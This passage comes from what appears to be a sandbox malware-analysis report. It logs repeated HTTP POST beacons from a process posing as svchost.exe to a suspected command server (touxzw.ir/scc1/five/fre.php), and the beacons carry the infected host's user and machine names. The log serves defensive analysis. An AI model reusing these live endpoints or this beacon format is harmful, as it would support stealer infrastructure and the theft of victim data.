found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	50023	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:34.044276953 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:34.049302101 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:34.780853033 CET	819	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:38:34 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fjjyv6PA1B65F5usqCuRuexHYAOF%2FdaQFkedIBggJ6xO6PmyjpY0iyg2h9EEmwhHE%2BQ5NAjTLUwjvcaZVIfGNO3CYCLaX9q13BpRYDc9Qqo19AA4nm4Z3y4ZupY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 917870995c0f7c81-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2085&min_rtt=2085&rtt_var=1042&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	50024	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:35.957895041 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:35.962917089 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:36.734057903 CET	847	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O9t6rnYawWknGKX3doMYVdSITeYXbm%2BF%2F3AOEYcUEwCw38twyvKfQGuDrx%2B0kFSDIfm20jNvY%2FHEhoNUVKupo4z53Uia%2BrCYVdfmc9r9l68yAzXbGNKErw1BJWA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 917870a54bb48c95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2275&min_rtt=2275&rtt_var=1137&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	50025	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:37.922226906 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:37.927242041 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:38.674113035 CET	819	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:38:38 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IKElm1BrG69BM1GCGMgABfWXtaRrXh0y4mjzC48UoHKvUyEmj72lIUAC8xG6PBh5UepkW2CnRu8xwKCfNkKoDvK%2FjHhOF%2BLpunz142ozL5Oh853QggFDe8ltgEo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 917870b1893b8ce0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2016&min_rtt=2016&rtt_var=1008&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	50026	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:39.835803032 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:39.840893984 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:40.633027077 CET	818	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:38:40 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z0GqNkM1QPl%2FdPti7Pd25VjtE40BZ2Q57ef8ceRUbqc3xUwgG06Sm7q0b61gMjYGe2gGPKp71R4QdoctZj44Tk7ws8R174DHt%2BYSUuhd95s6FY78bp05FDeF2aQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 917870bd794a0f90-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1498&min_rtt=1498&rtt_var=749&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=121&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	50027	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:41.801918983 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:41.806916952 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:42.574507952 CET	838	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vKBwXjny1g6nMaU1805Ew4ZEIO75POJNNcfl7nzK6tjXBcPKP84kLx8EbFEPEGJNodpWvyGHunUkom%2BZXZJXuAHEsVig7wKBNm2mGYq9v0l3Eb83UUDchoa5Hhk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 917870c9d82f41f3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1593&rtt_var=796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	50028	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:43.751555920 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:43.756690979 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:44.442533016 CET	844	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3BkHC9ymgD7PFhoWljgVpZuth%2F%2BXtVboOvovo18OiTdXD5FRpe4B5CjlcldydZV9iAusEqjoAJ7SHzsTu0hJLYaTqWSBUet%2FjPzbggaTDHs0kqUrKtE%2BsZwxyo0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 917870d5ff7142d0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1614&rtt_var=807&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	50029	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:45.612709999 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:45.617769957 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:46.373541117 CET	844	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9OG6hkrg9gcDPK7NOGwlLgOAHaQ91TN4QlicSIwRCTPi%2BpGWr%2BQLXYuiuyT8mVk3CLZsZHnG0%2BibGgD2fRlxPSnBU88DBZJyl%2BvJsqZzTaTknb7po3kbV3J0pOc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 917870e19978f799-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1838&min_rtt=1838&rtt_var=919&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	50030	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:47.538007021 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:47.543150902 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:48.183687925 CET	848	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g0WinGJxhrAqgiU5pk%2BP4pNFDkfsh9T8XwWsrVLXTM%2BNIfmwMmzsQRiBaWtq%2BZloSEoFQZeh%2B%2FICdostazQA9%2BKAVpe2abj3rmy1OUMSyXgxXl1Qmldry2YUeD4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 917870edbeaac472-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1650&rtt_var=825&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	50031	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:49.498078108 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:49.503055096 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:50.254812002 CET	842	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WEc35BgyXuN6pjV1foo57isbPFnY6OmPtjM3FsT7hgbrGfabBQTSfC6DF%2B4dbyBI6bRHKJr8Y6j6GeiJ%2FuukOfHuBI6zUDIovsElk6BFjHUwPN92OLemjK4xY%2BE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 917870f9dd7a8c48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1974&min_rtt=1974&rtt_var=987&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	50032	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:51.421555042 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:51.426845074 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:52.206058025 CET	836	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XGMxuaXTTDPLYYDL9eFWdhIVRWnjrfRHNFgebOAKYmzOyNkZNH5TOfLoUolx12M38HvChVUXuhdmyJltiVDK1YWSIwvfOXWjfTuDZcbp79g3eCdsGXXT865FHGk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91787105ef0f32d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1958&min_rtt=1958&rtt_var=979&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=141&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	50033	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:53.397034883 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:53.402370930 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:54.163459063 CET	842	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FnmyJseMkXtu1npFE7pCeJ3uNDkwG5Dlq4EuBWtXhjxAq%2BFlqCN5vAKwK0e%2BKFzzBC83L8VonKAek2uk4taS5FS2LU6xn9LGWa5PeVZW3KcFCT4fYZQHVrmNN7Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 917871124aed4257-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1618&rtt_var=809&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	50034	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:55.326555014 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:55.331665039 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:56.087047100 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:38:56 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eHhABGeIQxFhJWEexJyjVpWaAHvlBnEZcSwhnCUpYd4oZLMAGj3zI0wbzmGEu%2F0V1Bd%2F04USc4LO8G4LWl5El%2BqPPtesvD4w0fACLWFpYe1JKzE9UyeSOyep1VE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9178711e4d9342cc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1627&rtt_var=813&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	50035	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:57.251132965 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:57.256280899 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:58.054723978 CET	846	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eKHPmn0%2BmBghlu5mQqdfF8CgSyq1%2FbHcfHWemepHVeqzF7gQzhOj2cpvmNldlK%2FQDu9Ym3QFGzph39rG1IuaO7eJ2r%2FsgziVr%2BCnc4YDJ9S7Y9hCo4PABFRDeLE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9178712a9b010f68-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1761&rtt_var=880&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	50036	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:59.240937948 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:59.246009111 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
